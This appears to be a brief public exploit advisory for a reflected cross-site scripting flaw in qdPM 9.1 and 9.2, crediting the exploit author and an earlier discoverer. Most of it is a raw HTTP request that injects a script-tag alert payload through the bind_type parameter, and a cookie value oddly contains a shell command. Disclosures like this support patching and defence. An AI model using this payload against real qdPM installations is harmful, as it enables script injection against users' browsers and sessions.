Headline
qdPM 9.1 Cross Site Scripting
qdPM version 9.1 suffers from a cross site scripting vulnerability. Original discovery of cross site scripting in this version is attributed to Mehmet Emiroglu in 2019.
# Exploit Title: qdPM 9.x -[bind_type] - Cross-Site Scripting# Exploit Author: Or4nG.M4n# Date : 4/26/2023# Vendor Homepage: https://qdpm.net/# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download# Version: 9.2 , 9.1XSS Reflected .GET http://localhost/qdpm/index.php/extraFields?bind_type=<script>alert(OR4NG)</script> HTTP/1.1Host: localhostUser-Agent: Safari/89.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: ar,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflate, brConnection: keep-aliveCookie: skin=ColorNature; sidebar_closed=ls -al; qdPM8=rfjniks7j5mkaur7vcliou18bdUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: noneSec-Fetch-User: ?1